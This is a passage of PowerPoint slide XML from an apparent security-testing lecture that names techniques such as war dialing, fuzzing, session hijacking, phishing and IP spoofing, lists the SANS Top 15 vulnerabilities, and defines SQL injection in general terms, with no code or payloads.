              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>War </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dialing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using a Modem to dial a list of Telephone Numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Searching for Computers, Bulletin Board System and Fax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wireless LAN Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Searching  for existing WLAN and logging Wireless Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Points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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146"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15200" y="5410200"/>
            <a:ext cx="1249261" cy="1100138"/>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0462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smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (11)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwriting of Memory fragments of the Process, Buffers of Char type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random Data Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random Data Inputs by a Program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encoded Random Data included as Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashing built-in code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assertions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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2669730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t>Security Testing Techniques (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>12)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random Mutation Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bit Flipping of known Legitimate Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Byte stream Sliding  within known Legitimate Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation of Valid Computer Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation of the Web Session control mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gain unauthorized access to the Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16646532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19200"/>
            <a:ext cx="7924800" cy="1219201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2667000"/>
            <a:ext cx="7924800" cy="569120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3078" name="Picture 6"/>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67000" y="3505200"/>
            <a:ext cx="3810000" cy="2859287"/>
          </a:xfrm>
          <a:prstGeom prst="round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97453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solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Testing Techniques (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Masquerading as a trustworthy entity in an electronic communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acquiring usernames, passwords and credit card details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>deliver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>inaccessible web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rewriting</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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="http://www.contacturl.com/images/url.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010400" y="5257800"/>
            <a:ext cx="1620761" cy="1215571"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="6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0502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solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Testing Techniques (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>14)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating Internet Protocol (IP) packets with a forged source IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packet Sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Capture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Analyze all of the Network traffic</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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537875" y="4267200"/>
            <a:ext cx="2068251" cy="2171321"/>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23068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solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Testing Techniques (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual Private Network Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Psychological Manipulation of People</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Divulging confidential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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812381" y="4267200"/>
            <a:ext cx="1519238" cy="2293189"/>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87428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600200"/>
            <a:ext cx="7924800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16386"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803358" y="2895600"/>
            <a:ext cx="3537284" cy="2800350"/>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77995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5000" y="152400"/>
            <a:ext cx="7162800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>            Popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Software Attacks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5" y="1757363"/>
            <a:ext cx="8080868" cy="3967162"/>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111090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Security Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SANS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>System Administration, Networking, and Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Institute</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Established </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1989</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> as a cooperative research and education </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>more than 165,000 security professionals, auditors, system administrators, and network administrators to share the lessons they are learning and find solutions to the challenges they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>face</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.sans.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for more information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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23989545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SANS Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Most Dangerous Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unrestricted upload of dangerous file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL redirection to untrusted site (Open Redirect)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improper limitation of a pathname</a:t>
            </a:r>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18331738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SANS Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Most Dangerous Vulnerabilities (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Download of a code without integrity check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uncontrolled format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Missing or incorrect authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use of hard-coded credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Missing encryption of sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execution of unnecessary privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improper restriction of excessive authentication attempts</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170"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162800" y="4876800"/>
            <a:ext cx="1317332" cy="1414463"/>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526630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Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is SQL injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>code injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code is inserted into strings </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ater </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>passed to an instance of SQL Server for parsing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>execution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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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057900" y="3886200"/>
            <a:ext cx="2209800" cy="2301875"/>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http://www.mygeekpal.com/wp-content/uploads/2009/05/sql-injection-1.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881554" y="4359275"/>
            <a:ext cx="1828800" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13782"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="6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12819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SQL Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337038" y="1066800"/>
            <a:ext cx="8686800" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
